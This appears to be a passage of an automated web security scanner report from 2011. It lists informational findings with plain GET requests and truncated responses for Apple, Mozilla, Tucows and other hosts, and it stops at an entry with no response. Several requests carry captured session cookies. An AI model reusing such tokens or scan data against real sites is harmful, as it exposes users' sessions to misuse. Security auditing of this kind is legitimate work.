27.1. https://accounts.brightcove.com/en/terms-and-conditions/.  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.brightcove.com
Path:   /en/terms-and-conditions/.

Request

GET /en/terms-and-conditions/. HTTP/1.1
Host: accounts.brightcove.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:45:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
P3P: CP="CAO PSA OUR"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23165

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <meta
...[SNIP]...

27.2. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appleid.apple.com
Path:   /cgi-bin/WebObjects/MyAppleId.woa

Request

GET /cgi-bin/WebObjects/MyAppleId.woa?localang=en_US HTTP/1.1
Host: appleid.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:04:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7l
set-cookie: ISTLocale=ZW5fVVM%3D; version=1; expires=Fri, 03-Feb-2012 18:04:29 GMT; path=/
connection: close
content-length: 24701
MS-Author-Via: DAV
Content-Type: text/html; charset=UTF-8;

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


...[SNIP]...

27.3. https://author.tucows.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://author.tucows.com
Path:   /

Request

GET / HTTP/1.1
Host: author.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:52 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Connection: close
Content-Type: text/html
Content-Length: 13446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

27.4. https://bugzilla.mozilla.org/show_bug.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Thu, 03 Feb 2011 22:03:58 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 12477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...

27.5. https://buy.itunes.apple.com/WebObjects/MZFinance.woa/wa/redeemLandingPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.itunes.apple.com
Path:   /WebObjects/MZFinance.woa/wa/redeemLandingPage

Request

GET /WebObjects/MZFinance.woa/wa/redeemLandingPage HTTP/1.1
Host: buy.itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple WebObjects
x-apple-asset-version: 82804
x-apple-request-store-front: <null>
x-apple-date-generated: Thu, 03 Feb 2011 17:51:37 GMT
edge-control: cache-maxage=0s
content-type: text/html; charset=utf-8
x-apple-lokamai-no-cache: true
content-length: 4595
Date: Thu, 03 Feb 2011 17:51:37 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

<HTML>
<HEAD>
<TITLE>Connecting to the iTunes Store.</TITLE>
<META name="description" content="Connecting to the iTunes Store."></META>

...[SNIP]...

27.6. https://chat.teamsalesagent.com/tsa/JS/direct_619.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chat.teamsalesagent.com
Path:   /tsa/JS/direct_619.html

Request

GET /tsa/JS/direct_619.html HTTP/1.1
Host: chat.teamsalesagent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 1882
Content-Type: text/html
Last-Modified: Tue, 11 Jan 2011 15:23:54 GMT
Accept-Ranges: bytes
ETag: "2824e8fa3b1cb1:8dc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 22:04:02 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
<title></title>
<script type="text
...[SNIP]...

27.7. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fpdownload.macromedia.com
Path:   /get/flashplayer/current/swflash.cab

Request

GET /get/flashplayer/current/swflash.cab HTTP/1.1
Host: fpdownload.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 25 Oct 2010 23:47:03 GMT
ETag: "b72012-2a53a6-9bea6bc0"
Accept-Ranges: bytes
Content-Length: 2773926
Content-Type: text/plain
Date: Thu, 03 Feb 2011 22:06:12 GMT
Connection: close

MSCF.....=*.....D............................=*.................W..............;.s .swflash.inf..%+.......U=.. .FP_AX_CAB_INSTALLER.exe...~..@..[...
.`;v."Sp$......g...BN..0.C.8AH+..
0..H.....pv.90.;.
...[SNIP]...

27.8. https://i.spin3.com/jackpotcity/en/web/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://i.spin3.com
Path:   /jackpotcity/en/web/

Request

GET /jackpotcity/en/web/ HTTP/1.1
Host: i.spin3.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 22:06:16 GMT
Server: Microsoft-IIS/6.0
x-SPID: mob03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-gamesession: fcxr3e55ykk01555l5ifhryb
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-
...[SNIP]...

27.9. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.11.3.1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iforgot.apple.com
Path:   /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.11.3.1

Request

GET /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.11.3.1 HTTP/1.1
Host: iforgot.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:58:49 GMT
Server: Apache
connection: close
content-length: 9914
Content-Type: text/html; charset=utf-8


   <!DOCTYPE html>
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
   <head>
       
   <noscript>
       <META HTTP-EQUIV="Refresh" CONTENT="0;URL=/cgi-bin/WebObjects/DSiForgot.woa/33
...[SNIP]...

27.10. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iforgot.apple.com
Path:   /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.5

Request

GET /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.5 HTTP/1.1
Host: iforgot.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:58:48 GMT
Server: Apache
connection: close
content-length: 9914
Content-Type: text/html; charset=utf-8


   <!DOCTYPE html>
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
   <head>
       
   <noscript>
       <META HTTP-EQUIV="Refresh" CONTENT="0;URL=/cgi-bin/WebObjects/DSiForgot.woa/28
...[SNIP]...

27.11. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.7.1.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iforgot.apple.com
Path:   /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.7.1.5

Request

GET /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.7.1.5 HTTP/1.1
Host: iforgot.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:58:35 GMT
Server: Apache
connection: close
content-length: 9914
Content-Type: text/html; charset=utf-8


   <!DOCTYPE html>
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
   <head>
       
   <noscript>
       <META HTTP-EQUIV="Refresh" CONTENT="0;URL=/cgi-bin/WebObjects/DSiForgot.woa/11
...[SNIP]...

27.12. https://iforgot.apple.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iforgot.apple.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: iforgot.apple.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20accessories%20(us); s_cc=true; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:58:05 GMT
Server: Apache
Last-Modified: Sat, 13 Feb 2010 01:41:35 GMT
ETag: "4ba38-1e66-47f717bfc31c0"
Accept-Ranges: bytes
Content-Length: 7782
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

..............h...F...........h....... ...........    .. ..............(....... ...........@.............................................................................................................
...[SNIP]...

27.13. https://mktws.apple.com/acdws/notify.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mktws.apple.com
Path:   /acdws/notify.js

Request

GET /acdws/notify.js HTTP/1.1
Host: mktws.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:47:31 GMT
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l mod_jk/1.2.26
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:48:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
ETag: W/"20-1202883300000"
Last-Modified: Tue, 01 Feb 2011 08:40:26 GMT
Content-Length: 20
Connection: close
Content-Type: text/javascript

signalStatus("on");

27.14. https://ssl.apple.com/global/metrics/us/us.myinfo.metrics.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl.apple.com
Path:   /global/metrics/us/us.myinfo.metrics.html

Request

GET /global/metrics/us/us.myinfo.metrics.html HTTP/1.1
Host: ssl.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 18:04:32 GMT
Expires: Thu, 03 Feb 2011 18:14:32 GMT
Server: Apache/2.2.11 (Unix)
Connection: Keep-Alive
Content-length: 3334
Age: 0

<html>
<head>
<meta name="robots" content="noindex">
</head>
<body>
<!-- SiteCatalyst code version: H.8. Copyright 1997-2006 Omniture, Inc. -->
<script type="text/javascript">
/* RSID: */
var s_accoun
...[SNIP]...

27.15. https://store.apple.com/Catalog/US/Images/ordernumberinfo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Catalog/US/Images/ordernumberinfo.html

Request

GET /Catalog/US/Images/ordernumberinfo.html HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 19 Apr 2005 01:04:20 GMT
content-type: text/html
Date: Thu, 03 Feb 2011 18:11:50 GMT
x-request-id: 83fda341-088c-44bc-8435-0e4196791bc1
Content-Length: 2369
ETag: "103d4a-941-42645914"
Accept-Ranges: bytes
x-frame-options: sameorigin

<HTML>
<HEAD>
<TITLE>
The Apple Store (U.S.)
</TITLE>
<link rel="stylesheet" type="text/css" href="http://www.apple.com/main/css/fonts.css" title="fonts">
<script language ="JavaScript" >
<!--
window.
...[SNIP]...

27.16. https://www.securecheckout.billmelater.com/paycapture-content/fetch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.securecheckout.billmelater.com
Path:   /paycapture-content/fetch

Request

GET /paycapture-content/fetch HTTP/1.1
Host: www.securecheckout.billmelater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server:
Cache-Control: max-age=300, must-revalidate
Date: Thu, 03 Feb 2011 17:54:17 GMT
Content-Length: 4830
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

27.17. https://www.smartdevil.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /

Request

GET / HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
